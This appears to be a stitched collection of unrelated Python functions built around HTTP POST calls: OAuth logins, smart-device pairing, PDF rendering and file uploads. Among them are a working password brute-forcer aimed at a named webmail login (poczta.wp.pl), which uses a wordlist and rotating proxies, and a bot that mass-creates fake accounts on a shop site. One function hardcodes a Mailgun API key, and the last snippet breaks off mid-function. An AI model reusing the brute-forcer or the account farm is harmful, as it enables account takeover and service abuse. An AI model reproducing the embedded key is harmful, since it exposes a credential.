def _get_png_preview_or_overlaid_pdf(url, data, notification_id, json=True):
    """POST `data` to the template-preview service and return the response
    body base64-encoded.

    Args:
        url: Template-preview endpoint to call.
        data: Payload; sent as a JSON body when `json` is True, otherwise
            as a raw/form body.
        notification_id: Used only in the error message.
        json: Selects the body encoding (parameter name kept for
            backward compatibility even though it shadows the stdlib name).

    Returns:
        str: base64-encoded response content.

    Raises:
        InvalidRequest: on any non-200 response from the preview service.
    """
    headers = {
        'Authorization': 'Token {}'.format(
            current_app.config['TEMPLATE_PREVIEW_API_KEY'])
    }
    # Fix: the two branches differed only in the body-encoding kwarg;
    # collapse the duplicated request code into a single call site.
    body_kwargs = {'json': data} if json else {'data': data}
    resp = requests_post(url, headers=headers, **body_kwargs)
    if resp.status_code != 200:
        raise InvalidRequest(
            'Error generating preview letter for {} Status code: {} {}'.format(
                notification_id, resp.status_code, resp.content),
            status_code=500)
    return base64.b64encode(resp.content).decode('utf-8')
def login_github():
    """Complete the GitHub OAuth callback: exchange the temporary code for
    an access token, fetch the GitHub user, find or create the matching
    GithubLogin, and log the user in.

    Returns:
        A redirect response to the index page.
    """
    # Exchange the ?code= query parameter for an OAuth access token.
    at_response = requests_post(
        'https://github.com/login/oauth/access_token',
        data={
            'client_id': app.github_oauth_client_id,
            'client_secret': app.github_oauth_client_secret,
            'code': request.args['code'],
            'accept': 'application/json'
        }
    )
    # NOTE(review): asserts are stripped under `python -O`; consider
    # replacing with explicit error handling.
    assert at_response.status_code == 200
    # The token response is parsed as a form-encoded body (url_decode),
    # e.g. "access_token=...&token_type=...".
    response_data = url_decode(at_response.text)
    access_token = response_data['access_token']
    user_response = requests_get('https://api.github.com/user',
                                 params={'access_token': access_token})
    assert user_response.status_code == 200
    user_data = user_response.json()
    try:
        login = session.query(GithubLogin).filter_by(
            uid=user_data['login']
        ).one()
    except NoResultFound:
        # First login for this GitHub uid: create a User and link it.
        login = GithubLogin(user=User(), uid=user_data['login'])
        login.user.display_name = login.identifier()
        session.add(login)
        session.commit()
    login_user(login.user)
    return redirect(url_for('pages.index'))
def auth(self):
    """Register with the Hue bridge and store the resulting API token.

    Returns:
        True on successful authorization; False when the link button has
        not been pressed (bridge error 101) or the bridge cannot be
        reached / answers unexpectedly.
    """
    print("Registering HueBridge...")
    # Send API request
    data = {'devicetype': 'wooferbot'}
    url = "http://{}:80/api".format(self.ip)
    result = requests_post(url, data=json_dumps(data), timeout=5)
    if result.status_code == 200:
        # The bridge answers with a list of result objects; iterate them
        # directly (fix: replaces manual i=-1 / i+=1 index bookkeeping that
        # re-indexed the same element it was already iterating over).
        for item in result.json():
            # Authorization requires hardware confirmation
            if 'error' in item:
                if item['error']['type'] == 101:
                    print("Error: Press link button and try again")
                    return False
            # Authorization successful
            if 'success' in item:
                self.token = item['success']['username']
                print("Authorized successfully")
                return True
    # General error
    print("Error connecting")
    return False
def get_access_token(clientId: str, clientSecret: str, refreshToken: str):
    """Exchange an OAuth2 refresh token for a fresh Google access token.

    Args:
        clientId: OAuth2 client id.
        clientSecret: OAuth2 client secret.
        refreshToken: long-lived refresh token.

    Returns:
        (access_token, expiration_unix_time) on success, or None when the
        token endpoint answers non-200.  (The previous `-> str` annotation
        was wrong — the function has always returned a tuple or None — so
        it has been removed.)
    """
    print("Refreshing access token")
    start_time = time.time()
    r = requests_post(
        "https://www.googleapis.com/oauth2/v4/token",
        headers={"Accept": "application/json"},
        data={
            "client_id": clientId,
            "client_secret": clientSecret,
            "refresh_token": refreshToken,
            "grant_type": "refresh_token",
        },
    )
    if r.status_code != 200:
        print("\nGet token failed:")
        print(r.status_code)
        # Fix: requests.Response has no `.data` attribute (AttributeError
        # on this path); `.text` holds the response body.
        print(r.text, "\n")
        return None
    rjson = r.json()
    token = rjson["access_token"]
    # "expires_in" is a lifetime in seconds, measured from request start.
    expiration = start_time + rjson["expires_in"]
    print(f"Got access token: {token[:15]}[...]")
    return token, expiration
def get_letters_pdf(template, contact_block, filename, values):
    """Render a letter PDF via the template-preview service.

    Returns a (pdf_bytes, billable_units) tuple, where billable units are
    printed sheets at two pages per sheet, rounded up.
    """
    payload = {
        "letter_contact_block": contact_block,
        "template": {
            "subject": template.subject,
            "content": template.content,
        },
        "values": values,
        "filename": filename,
    }
    host = current_app.config["TEMPLATE_PREVIEW_API_HOST"]
    api_key = current_app.config["TEMPLATE_PREVIEW_API_KEY"]
    resp = requests_post(
        "{}/print.pdf".format(host),
        json=payload,
        headers={"Authorization": "Token {}".format(api_key)},
    )
    resp.raise_for_status()
    # Letters are printed double-sided: two pages fit on one sheet.
    pages_per_sheet = 2
    page_count = int(resp.headers.get("X-pdf-page-count", 0))
    billable_units = math.ceil(page_count / pages_per_sheet)
    return resp.content, billable_units
def _post_xml(scanner_ip, xml):
    """POST a scan-job XML document to an eSCL scanner.

    Returns:
        (next_document_url, 201) when the job was created, otherwise
        (reason_phrase, status_code) from the scanner's response.
    """
    endpoint = 'http://{0}/eSCL/ScanJobs'.format(scanner_ip)
    resp = requests_post(endpoint,
                         data=xml,
                         headers={'Content-Type': 'text/xml'})
    if resp.status_code != 201:
        return resp.reason, resp.status_code
    # 201 Created: the Location header points at the new job.
    return '{0}/NextDocument'.format(resp.headers['Location']), 201
def make_shorten_url(self, longUrl=None, idx=None):
    """Create a goo.gl short URL for this object and cache it on the model.

    Args:
        longUrl: URL to shorten; defaults to self.ui_url.
        idx: forwarded to get_api_key to select an API key.

    Returns:
        The shortened URL string, or None on any API/network failure.
    """
    if self.shorten_url:
        return self.shorten_url
    from json import dumps as _json_dumps
    headers = {'content-type': 'application/json'}
    from base.google import get_api_key
    api_key = get_api_key(idx)
    api_url = 'https://www.googleapis.com/urlshortener/v1/url?key=%s' % api_key
    if not longUrl:
        longUrl = self.ui_url
    # TODO: hacky rewrite of local dev hosts to the public domain, kept for
    # testing. Improve.
    longUrl = longUrl.replace('http://192.168.1.2:8000/', 'http://phopl.com/')
    longUrl = longUrl.replace('http://192.168.1.3:8000/', 'http://phopl.com/')
    # Fix: build the JSON body with a real encoder instead of '%s' string
    # interpolation, which produced invalid JSON for URLs containing
    # quotes or backslashes.
    data = _json_dumps({'longUrl': longUrl})
    try:
        r = requests_post(api_url, headers=headers, data=data, timeout=60)
    except Exception:
        # Fix: narrowed from a bare `except:` so KeyboardInterrupt and
        # SystemExit propagate instead of being swallowed.
        return None
    if not r.status_code == status.HTTP_200_OK:
        return None
    d = json_loads(r.content)
    if not d or 'id' not in d or not d['id']:
        return None
    shorten_url = d['id']
    self.shorten_url = shorten_url
    self.save()
    return shorten_url
def optimize(self, spec):
    """Send `spec` to the local optimizer service and return its JSON reply.

    Raises:
        Exception: when the service response is not valid JSON.
    """
    endpoint = 'http://127.0.0.1:{}/process'.format(self.port)
    try:
        response = requests_post(endpoint, data=json_dumps(spec))
        return response.json()
    except ValueError:
        raise Exception(
            'No JSON object could be decoded from API response.')
def get_letters_pdf(template, contact_block, filename, values):
    """Request a printable letter PDF from the template-preview API.

    Returns the PDF bytes and the billable sheet count (two pages per
    sheet, rounded up).
    """
    resp = requests_post(
        '{}/print.pdf'.format(current_app.config['TEMPLATE_PREVIEW_API_HOST']),
        json={
            'letter_contact_block': contact_block,
            'template': {
                'subject': template.subject,
                'content': template.content,
            },
            'values': values,
            'filename': filename,
        },
        headers={
            'Authorization':
                'Token {}'.format(current_app.config['TEMPLATE_PREVIEW_API_KEY'])
        })
    resp.raise_for_status()
    # Bill per printed sheet: 2 pages/sheet, rounding up.
    sheets = math.ceil(int(resp.headers.get("X-pdf-page-count", 0)) / 2)
    return resp.content, sheets
def auth(self):
    """Register with the Hue bridge and store the resulting API token.

    Returns:
        True on successful authorization; False when the link button has
        not been pressed (bridge error 101) or the bridge cannot be
        reached / answers unexpectedly.
    """
    self.settings.log("Registering HueBridge...")
    # Send API request
    data = {"devicetype": "wooferbot"}
    url = "http://{}:80/api".format(self.ip)
    result = requests_post(url, data=json_dumps(data), timeout=5)
    if result.status_code == 200:
        # The bridge answers with a list of result objects; iterate them
        # directly (fix: replaces manual i=-1 / i+=1 index bookkeeping that
        # re-indexed the element already being iterated).
        for item in result.json():
            # Authorization requires hardware confirmation
            if "error" in item:
                if item["error"]["type"] == 101:
                    self.settings.log(
                        "Error: Press link button and try again")
                    return False
            # Authorization successful
            if "success" in item:
                self.token = item["success"]["username"]
                self.settings.log("Authorized successfully")
                return True
    # General error
    self.settings.log("Error connecting")
    return False
def UploadFile(self, original_filename, filedata):
    """Upload `filedata` (bytes) to the device under `original_filename`.

    The multipart/form-data body is built by hand because the requests
    library RFC-2231-encodes non-ASCII filenames
    (filename*=utf-8''%D1%80...), which this device does not accept.
    """
    url = self._base_url + '/cgi/upload/'
    log('Request: POST ' + url)
    # files = {'file': (original_filename, filedata)}
    # r = requests_post(url, files=files)
    # NOTE: requests library has bad support for
    # upload files with utf-8 names
    # It encodes utf-8 file name in the following form:
    # filename*=utf-8\'\'%D1%80%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9.%D1%84%D0%B0%D0%B9%D0%BB
    # This is why I'm constructing multipart message manually
    boundary = b'Ab522e64be24449aa3131245da23b3yZ'
    encoded_filename = original_filename.encode('utf-8')
    # Single part: --boundary, Content-Disposition header with the raw
    # UTF-8 filename, blank line, file bytes, closing --boundary--.
    payload = b'--' + boundary + b'\r\nContent-Disposition: form-data' \
        + b'; name="file"; filename="' + encoded_filename \
        + b'"\r\n\r\n' + filedata + b'\r\n--' + boundary + b'--\r\n'
    content_type = 'multipart/form-data; boundary=' \
        + boundary.decode('utf-8')
    headers = {'Content-Type': content_type}
    r = requests_post(url, data=payload, headers=headers)
    self.CheckHttpError(r)
def post(self, bypass_ratelimit: bool = False):
    """Send the VIES checkVat SOAP request for this country/VAT id and run
    validation on the response.

    bypass_ratelimit is a switch to bypass the 1 minute API ban after
    sending the same data twice.  API returns valid=False correctly for
    invalid requests, even when ratelimited.  The idea is to exploit this
    behaviour by first sending an invalid request for the same country,
    making sure that the server returned the correct valid=False response,
    and then continuing to check the real VAT ID, considering the
    ratelimit error as success.
    """
    headers = {'Content-type': 'text/xml'}
    # SOAP 1.1 envelope; the two %s slots are countryCode and vatNumber.
    xml_request = '' \
        '<?xml version="1.0" encoding="UTF-8"?>' \
        '<SOAP-ENV:Envelope ' \
        'xmlns:ns0="urn:ec.europa.eu:taxud:vies:services:checkVat:types" ' \
        'xmlns:ns1="http://schemas.xmlsoap.org/soap/envelope/" ' \
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \
        'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">' \
        '<SOAP-ENV:Header/>' \
        '<ns1:Body>' \
        '<ns0:checkVat>' \
        '<ns0:countryCode>%s</ns0:countryCode>' \
        '<ns0:vatNumber>%s</ns0:vatNumber>' \
        '</ns0:checkVat>' \
        '</ns1:Body>' \
        '</SOAP-ENV:Envelope>'
    self.data = xml_request % (self.country_code, self.vat_id)
    if bypass_ratelimit:
        # Probe with a deliberately invalid VAT number first.
        data = xml_request % (self.country_code, '1337')
        self.response = requests_post(url=self.url,
                                      data=data,
                                      headers=headers,
                                      timeout=self.timeout)
        self.validate()
        if self.error:
            return  # The server is down, do not try to send the real request
    self.response = requests_post(url=self.url,
                                  data=self.data,
                                  headers=headers,
                                  timeout=self.timeout)
    self.validate(bypass_ratelimit)
def __call__(self, data):
    """POST `data['content']` to the conversion API and return a dict
    describing the resulting XML document (filename, content, type).

    Raises:
        requests.HTTPError: via raise_for_status on a bad response.
    """
    response = requests_post(
        self._api_url,
        headers={'Content-Type': data['type']},
        data=data['content'],
    )
    response.raise_for_status()
    converted = {
        'filename': change_ext(data['filename'], None, '.xml'),
        'content': response.text,
        'type': response.headers['Content-Type'],
    }
    return converted
def lambda_handler(event, context):
    """Scheduler loop: repeatedly queries each bot and forwards the replies
    to the Hut34 Firebase stream, sleeping a minute per cycle, until the
    21st of the month.

    NOTE(review): `event` / `context` are unused and the handler loops
    indefinitely, which is unusual for a Lambda — confirm intended runtime.
    NOTE(review): `n` is printed as the cycle count but never incremented.
    """
    # Inst some objects
    price_list = []
    n = 0
    while True:
        # Run until monday 21st may
        if datetime.datetime.now().day > 20:
            break
        print("[INFO] Scheduler has been running for {} cycles".format(n))
        # Shuffle through multiple bots if required
        for bot in bots:
            inner_list = []
            # Iterate over all requests to each bot
            for line in lines:
                # Build and make request
                payload = json_dumps({"message": "@" + bot + " " + line })  # convert dict to str
                response = requests_post(URL, data=payload)  # do post
                # Process request
                print(response.json()["message"])
                #a = dict((k, response.json()[k]) for k in ["timestamp","message"]) # just extact timestamp and message
                #inner_list.append(a) #collect the responses in a list
                # Send to hut34 Firebase
                #params = json_dumps({"botid":"cryptobot"})
                payload = response.json()
                payload["botid"] = "cryptobot"
                payload = json_dumps(payload)
                # NOTE(review): payload is sent as query params, not as the
                # request body — confirm this is what the stream expects.
                r = requests_post(STREAM, headers=auth, params=payload)  #, data = payload)
                print(r.json() )  #["firebase_key"]) #print firebase key to confirm
            #price_list = price_list + inner_list #join the lists together
        time.sleep(60)  #wait for 1 min
def get_token(code):
    """Exchange a Discord OAuth2 authorization code for an access token.

    Returns the access token string, or None if the response JSON has no
    "access_token" key.
    """
    form = {
        "client_id": Oauth.client_id,
        "client_secret": Oauth.client_secret,
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": Oauth.redirect_url,
        "scope": Oauth.scope,
    }
    response = requests_post(
        url=Oauth.discord_token_url,
        data=form,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    return response.json().get("access_token")
def send_email(to, title, msg):
    """Send a plain-text email via the Mailgun HTTP API.

    Args:
        to: recipient address; the local part doubles as the display name.
        title: subject line.
        msg: plain-text body.

    Returns:
        True when Mailgun answers 200 OK.

    NOTE(review): the Mailgun API key is hardcoded below — move it to
    configuration / secret storage and rotate the exposed key.
    """
    from requests import post as requests_post
    from rest_framework import status
    to_name = to.split('@')[0]
    data = {
        'from': '사진 공유 서비스 포플(PHOPL) <*****@*****.**>',
        'to': '%s <%s>' % (to_name, to),
        'subject': title,
        'text': msg
    }
    r = requests_post('https://api.mailgun.net/v3/maukistudio.com/messages',
                      auth=('api', 'key-1b25db28c7b404487efb45adc1aaf953'),
                      data=data)
    return r.status_code == status.HTTP_200_OK
def download_job_sid(self, sid, mode='json', filename=None): """ Wrapper for streaming results to a file instead of through sockets with the API. :param sid: sid of job :param mode: json, csv, or xml :return: local filename, False if failure """ # Only tested on 6.3, may need to mod this job_sid_url = 'https://{0}/en-US/api/search/jobs/{1}/results?isDownload=true&' \ 'timeFormat=%25FT%25T.%25Q%25%3Az&maxLines=0&count=0&filename=&outputMode={2}' \ '&spl_ctrl-limit=unlimited&spl_ctrl-count=50000'.format(self.host, sid, mode) if not filename: filename= '{0}.{1}'.format(sid, mode) cookie_builder = {} for l in self._auth_headers: for x in l[1].split('; '): q = x.split('=') cookie_builder[q[0]] = q[1] r = requests_get(job_sid_url, stream=True, cookies=cookie_builder, verify=False) cnt = 0 with open(filename, 'wb') as f: # I have the bandwidth to do this size, you may not. for chunk in r.iter_content(chunk_size=1024*1024*1024): if chunk: f.write(chunk) cnt += 1 if cnt % 1000 == 0: # Call control occasionally to keep the export stream alive requests_post(r'https://{0}/en-US/splunkd/__raw/services/search/jobs/{1}/control' .format(self.host, sid), data={ 'output_mode': mode, 'action': 'touch' }, cookies=cookie_builder, verify=False) return filename
def getToken(self, video_config):
    """Fetch a playback token for `video_config` from its auth endpoint and,
    on success, attach it to the config under 'token'.

    The config dict is mutated and returned either way.
    """
    auth_config = video_config.get('auth_config')
    headers = auth_config.get('headers')
    # The stored Authorization header is base64-encoded; decode in place.
    headers.update(
        dict(Authorization=b64decode(headers.get('Authorization'))))
    payload = dict(fileReference=video_config.get('id'),
                   v='1',
                   originatorHandle=video_config.get('originator_handle'))
    if video_config.get('user_token_required'):
        payload.update(dict(userToken=self.plugin.get_setting('user_token')))
    res = requests_post(video_config.get('auth_config').get('url'),
                        headers=headers,
                        data=payload)
    if res.status_code == 200:
        # The body is the token wrapped in quotes; strip first/last char.
        video_config.update(dict(token=res.text[1:-1]))
    return video_config
def _sanitise_precompiled_pdf(self, notification, precompiled_pdf):
    """Send a precompiled letter PDF to template-preview for sanitisation.

    Returns:
        (sanitise_json, "validation_passed") on success, or
        (error_json, "validation_failed") when the service rejects the
        PDF with a 400.  Any other failure schedules a Celery retry; when
        retries are exhausted the notification is marked as a technical
        failure and the error re-raised.
    """
    try:
        response = requests_post(
            '{}/precompiled/sanitise'.format(
                current_app.config['TEMPLATE_PREVIEW_API_HOST']),
            data=precompiled_pdf,
            headers={
                'Authorization': 'Token {}'.format(
                    current_app.config['TEMPLATE_PREVIEW_API_KEY']),
                'Service-ID': str(notification.service_id),
                'Notification-ID': str(notification.id)
            })
        response.raise_for_status()
        return response.json(), "validation_passed"
    except RequestException as ex:
        if ex.response is not None and ex.response.status_code == 400:
            # Fix: read the body from ex.response — the local `response`
            # name is unbound when requests_post itself raised. Also parse
            # the JSON once instead of on every access.
            error_json = ex.response.json()
            message = "sanitise_precompiled_pdf validation error for notification: {}. ".format(
                notification.id)
            if error_json.get("message"):
                message += error_json["message"]
            if error_json.get("invalid_pages"):
                message += (
                    " on pages: "
                    + ", ".join(map(str, error_json["invalid_pages"])))
            current_app.logger.info(message)
            return error_json, "validation_failed"
        try:
            current_app.logger.exception(
                "sanitise_precompiled_pdf failed for notification: {}".format(
                    notification.id))
            self.retry(queue=QueueNames.RETRY)
        except MaxRetriesExceededError:
            current_app.logger.error(
                "RETRY FAILED: sanitise_precompiled_pdf failed for notification {}"
                .format(notification.id),
            )
            notification.status = NOTIFICATION_TECHNICAL_FAILURE
            dao_update_notification(notification)
            raise
def register_images():
    """Upload every prepared *.jpg to the file-registration endpoint,
    printing and skipping any file the server does not accept with 201."""
    from pks.settings import SERVER_HOST
    tokens = {
        'auth_user_token': AUTH_USER_TOKEN,
        'auth_vd_token': AUTH_VD_TOKEN
    }
    for file_name in glob('%s/*.jpg' % IMAGE_PREPARED_PATH):
        with open(file_name, 'rb') as f:
            response = requests_post('%s/rfs/' % SERVER_HOST,
                                     files={'file': f},
                                     data=tokens)
            if response.status_code != status.HTTP_201_CREATED:
                # Report the failure and carry on with the next file.
                print(response.text)
                print(file_name)
                print('------------------------------')
                #break
                continue
def bot(id):
    """Worker loop: registers throwaway matzoo.pl accounts through random
    proxies, appending successful credentials to the shared `accounts`
    file.

    Args:
        id: worker number, used only in log prefixes (shadows the builtin
            `id`).
    """
    global args, locks, proxies, accounts
    while True:
        try:
            with locks[0]:
                # Refill the shared proxy pool when exhausted; take one
                # proxy out so workers don't reuse it concurrently.
                if len(proxies) == 0:
                    proxies.extend(get_proxies())
                proxy = choice(proxies)
                proxies.remove(proxy)
            log('[INFO][%d] Connecting to %s' % (id, proxy))
            user_agent = get_random_string(30, 100)
            log('[INFO][%d] Setting user agent to %s' % (id, user_agent))
            email = '%s@%s.com' % (get_random_string(
                8, 500), get_random_string(8, 500))
            log('[INFO][%d] Setting email to %s' % (id, email))
            password = get_random_string(8, 500)
            log('[INFO][%d] Setting password to %s' % (id, password))
            response = requests_post('http://matzoo.pl/rejestracja',
                                     data={
                                         'email1': email,
                                         'email2': email,
                                         'password1': password,
                                         'password2': password,
                                         'regulamin': '1',
                                         'zgoda': '1',
                                         'newsletter': '1',
                                         'kod': 'cztery'
                                     },
                                     headers={'User-Agent': user_agent},
                                     proxies={'http': proxy},
                                     timeout=10)
            # UTF-8 bytes of "UDAŁO SIĘ!" (Polish: "it worked!") mark a
            # successful signup in the response page.
            if b'UDA\xc5\x81O SI\xc4\x98!' in response.content:
                with locks[1]:
                    accounts.write('%s\t%s\n' % (email, password))
                    accounts.flush()
                logv('[INFO][%d] Successfully created account' % id)
            else:
                logv('[INFO][%d] Could not create account' % id)
        except RequestException as e:
            log('[WARNING][%d] %s' % (id, e.__class__.__name__))
        except KeyboardInterrupt:
            exit(0)
        except:
            # NOTE(review): bare except — any unexpected error kills the
            # worker silently with exit code 1.
            exit(1)
def auth(self):
    """Request a new auth token from a Nanoleaf controller.

    Returns:
        True (and stores the token on self.token) on success; False when
        the device is not in discovery mode (403) or answers with any
        other status.
    """
    print("Auth with nanoleaf...")
    # Send API request
    url = "http://{}:16021/api/v1/new".format(self.ip)
    result = requests_post(url)
    # Authorization successful
    if result.status_code == 200:
        print("Authorized ok")
        self.token = result.json()['auth_token']
        return True
    # Authorization requires hardware confirmation
    if result.status_code == 403:
        print("Nanoleaf not in discovery mode.")
        print(
            "Hold down power button for ~5 seconds until led starts blinking."
        )
    # Fix: previously any status other than 200/403 fell off the end and
    # returned None; return False explicitly on every failure path.
    return False
def login(self, silence=False):
    """Log in to the Sky Sport auth endpoint with stored credentials and
    cache the session token plus settings derived from its JWT payload.

    Args:
        silence: when True, suppresses the success notification.
    """
    data = self.credential.get_credentials()
    res = requests_post('https://auth.sport.sky.de/login',
                        data=dict(user=data.get('user'),
                                  pin=data.get('password')))
    if res.status_code == 200:
        self.credential.set_credentials(data.get('user'),
                                        data.get('password'))
        # Response body is the JWT wrapped in quotes; strip them.
        user_token = res.text[1:-1]
        self.plugin.set_setting('user_token', user_token)
        self.plugin.set_setting('login_acc', data.get('user'))
        # Decode the JWT payload (second dot-separated segment).
        token_payload = json_loads(
            self.plugin.b64dec(user_token.split('.')[1]))
        self.plugin.set_setting('booked_packages',
                                ','.join(token_payload.get('packages')))
        self.plugin.set_setting('token_exp', str(token_payload.get('exp')))
        if silence == False:
            self.plugin.dialog_notification('Anmeldung erfolgreich')
    else:
        # Login failed ("Anmeldung nicht erfolgreich").
        self.plugin.dialog_notification('Anmeldung nicht erfolgreich')
async def challonge_here(command, msg, user, channel, *args, **kwargs): here_parts = {} # Stores active participants # if not enough arguments, we end early if not msg: raise Exception(bold("Challonge_Here") + ": Not enough arguments. Please provide a user to checkin.") async with channel.typing(): parts, tour_url = await start_challonge(command, msg, channel, kwargs['guild']) # Get all the participants and the tournament URL for part in parts: # Grab every participant and get the useful information (display name and id number) here_parts.update({part['participant']['display_name'].lower():part['participant']['id']}) # Check to make sure that participant exists in tourney try: checkin_id = str(here_parts[msg.lower()]) except KeyError: # Tell the messenger that the user is not in the tournament raise Exception(bold("Challonge_Here") + ": Lizard-BOT cannot find {0} in the tournament.".format(bold(msg))) # Send the check in request to Challonge checkin_post = requests_post(base_url + tour_url + "/participants/" + checkin_id +"/check_in.json", headers={"User-Agent":"Lizard-BOT"}, auth=(chal_user, api_key)) # Check to make sure we get a good response if '200' in str(checkin_post.status_code): # Good response. Return that the score was updated return "Checked in: {0}".format(bold(msg)) elif '401' in str(checkin_post.status_code): # Permission error raise Exception(bold("Challonge_Here") + ": Lizard-BOT does not have access to the tournament") elif '422' in str(checkin_post.status_code): # Checkin period not running raise Exception(bold("Challonge_Here") + ": The check-in window hasn't started or is over for the tournament") else: # Some other challonge error. Print it to console and error with appropriate message print(checkin_post.text) raise Exception(bold("Challonge_Here") + ": Unknown Challonge error for <" + tour_url + "> while checking in: " + msg) # Message showing who is not checked in and who is not in the Discord return
def _sanitise_precompiled_pdf(self, notification, precompiled_pdf):
    """Send a precompiled letter PDF to template-preview for sanitisation.

    Returns:
        The successful response object, or None when the service rejects
        the PDF with a 400.  Any other failure schedules a Celery retry;
        when retries are exhausted the notification is marked as a
        technical failure and the error re-raised.
    """
    try:
        response = requests_post(
            "{}/precompiled/sanitise".format(
                current_app.config["TEMPLATE_PREVIEW_API_HOST"]),
            data=precompiled_pdf,
            headers={
                "Authorization": "Token {}".format(
                    current_app.config["TEMPLATE_PREVIEW_API_KEY"]),
                "Service-ID": str(notification.service_id),
                "Notification-ID": str(notification.id),
            },
        )
        response.raise_for_status()
        return response
    except RequestException as ex:
        if ex.response is not None and ex.response.status_code == 400:
            # Fix: read the body from ex.response — the local `response`
            # name is unbound when requests_post itself raised. Also parse
            # the JSON once instead of twice.
            error_json = ex.response.json()
            message = "sanitise_precompiled_pdf validation error for notification: {}. ".format(
                notification.id)
            if "message" in error_json:
                message += error_json["message"]
            current_app.logger.info(message)
            return None
        try:
            current_app.logger.exception(
                "sanitise_precompiled_pdf failed for notification: {}".format(
                    notification.id))
            self.retry(queue=QueueNames.RETRY)
        except MaxRetriesExceededError:
            current_app.logger.error(
                "RETRY FAILED: sanitise_precompiled_pdf failed for notification {}"
                .format(notification.id),
            )
            notification.status = NOTIFICATION_TECHNICAL_FAILURE
            dao_update_notification(notification)
            raise
def bot(id):
    """Worker loop: tries wordlist passwords for `args.email` against the
    poczta.wp.pl login endpoint through rotating proxies. Terminates the
    process with exit(0) as soon as a password succeeds.

    Args:
        id: worker number, used only in log prefixes (shadows the builtin
            `id`).
    """
    global args, locks, proxies, wordlist
    while True:
        with locks[1]:
            try:
                password = next(wordlist).strip()
            except:
                # Wordlist exhausted (or unreadable): this worker is done.
                break
        log('[INFO][%d] Setting password to %s' % (id, password))
        while True:
            try:
                with locks[0]:
                    # Refill the shared proxy pool when exhausted; take a
                    # proxy out so workers don't reuse it concurrently.
                    if len(proxies) == 0:
                        proxies.extend(get_proxies())
                    proxy = choice(proxies)
                    proxies.remove(proxy)
                log('[INFO][%d] Connecting to %s' % (id, proxy))
                response = requests_post('https://poczta.wp.pl/login/v1/token',
                                         params={'zaloguj': 'poczta'},
                                         data={
                                             'login_username': args.email,
                                             'password': password
                                         },
                                         proxies={'https': proxy},
                                         timeout=10,
                                         allow_redirects=False)
                # A session cookie is only set on successful login.
                if len(response.cookies):
                    logv('[INFO][%d] Successfully cracked password: %s' %
                         (id, password))
                    exit(0)
                else:
                    logv('[INFO][%d] Invalid password: %s' % (id, password))
                    break
            except (RequestException, SSLError) as e:
                # Proxy/network error: loop again with another proxy.
                log('[WARNING][%d] %s' % (id, e.__class__.__name__))
            except KeyboardInterrupt:
                exit(0)
            except:
                # NOTE(review): bare except — any unexpected error kills
                # the worker silently with exit code 1.
                exit(1)
def UploadText(self, title, text):
    """Create a text document on the device via the /cgi/addtext/ endpoint."""
    url = self._base_url + '/cgi/addtext/'
    log('Request: POST ' + url)
    response = requests_post(url, data={'title': title, 'body': text})
    self.CheckHttpError(response)
def post(model, *args, **kwargs):
    """POST to `model.url` with `args` as the form payload, authenticating
    with HTTP digest credentials taken from the model.

    Returns:
        The HTTP status code of the response.

    NOTE(review): `kwargs` is accepted but never sent to the server, and
    `timeout=None` means the request can block indefinitely — confirm both
    are intended.
    """
    url = model.url
    auth = HTTPDigestAuth(model.auth_username, model.auth_password)
    payload = {'args': args}
    response = requests_post(url, data=payload, auth=auth, timeout=None)
    return response.status_code
except Exception as error: sys_exit(f'{error}') for i in range(0, config["nb_smartplug"]): ip_smartplug = str(ipaddressIPv4(config["smartplugs"][i])) smartplugs.append(SmartPlug(ip_smartplug)) while True: for smartplug in smartplugs: try: data = "" smartplug_data = smartplug.info smartplug_data.update(smartplug.emeter_stats()) data = f'hs110 mac="{smartplug_data["mac"]}",version="{smartplug_data["sw_ver"]}",name="{smartplug_data["alias"]}",state={smartplug_data["relay_state"]},voltage_mv={smartplug_data["voltage_mv"]},current_ma={smartplug_data["current_ma"]},power_mw={smartplug_data["power_mw"]},total_wh={smartplug_data["total_wh"]}\n' r = requests_post(config["influxdb"]["url"] + '/write', data=data, params={ 'db': config["influxdb"]["database"], 'u': config["influxdb"]["username"], 'p': config["influxdb"]["password"] }) if r.status_code != 204: logger.error( f'Error can\'t send data to InfluxDB URL --> {config["influxdb"]["url"]}\nHTTP Error code --> {r.status_code}' ) else: logger.info(f'{data}') except Exception as error: logger.error(f'{error}') time_sleep(config["delay"])
def RemoveFile(self, url_filename): url = self._base_url + '/cgi/remove/' log('Request: POST ' + url) formdata = {'fileName': url_filename} r = requests_post(url, data=formdata) self.CheckHttpError(r)
def RemoveAllFiles(self): url = self._base_url + '/cgi/remove-all/' log('Request: POST ' + url) r = requests_post(url, data='') self.CheckHttpError(r)
def hash_rows(stop_flag):
    """Hash new vehicle rows and publish them to the VinDB service.

    Reads unsent rows in batches, filters out implausible VINs, signs each
    batch with the VinChain wallet, and POSTs it to the VinDB create
    endpoint. Loops until `stop_flag[0]` becomes truthy or no new rows
    remain.

    Args:
        stop_flag: one-element mutable sequence acting as a cancel flag.

    Returns:
        int: number of rows hashed across all batches.

    Raises:
        Exception: when VinDB answers with a status other than 201.
    """
    latest_hashed = get_last_sent_id()
    print(latest_hashed)
    have_new_rows = True
    hashed_rows = 0
    model = get_vehicle_model()
    serializer = get_vehicle_serializer()
    while not stop_flag[0] and have_new_rows:
        latest_id = get_latest_id(model)
        new_rows = get_new_rows(model, latest_hashed,
                                settings.max_size_hashed_batch)
        records = []
        if not len(new_rows):
            have_new_rows = False
        for new_row in new_rows:
            # Skip rows without a plausible VIN: present, at most 17
            # characters, alphanumeric/dash only.
            if new_row['vin'] is None:
                continue
            if len(new_row['vin']) > 17:
                continue
            # if new_row['create_date'] > datetime.now() - timedelta(days=3):
            #     continue
            if not re.match(r'^[a-zA-Z0-9\-]+$', new_row['vin']):
                continue
            latest_hashed = new_row[settings.vehicle_model_primary_key]
            hashed_rows += 1
            records.append({
                'uuid': new_row[settings.vehicle_model_primary_key],
                'vin': new_row[settings.vehicle_model_vin_key],
                'standard_version': settings.vindb_hash_functions,
                'hash': hash_functions[settings.vindb_hash_functions](
                    serializer(new_row))
            })
        if len(records):
            blockchain = VinChain(node=settings.vinchain_node,
                                  blocking=True,
                                  debug=False,
                                  known_chains={
                                      'VIN': {
                                          'chain_id': settings.vinchain_chain_id,
                                          'core_symbol': 'VIN',
                                          'prefix': 'VIN'
                                      },
                                  })
            blockchain.wallet.unlock(settings.vinchain_wallet_password)
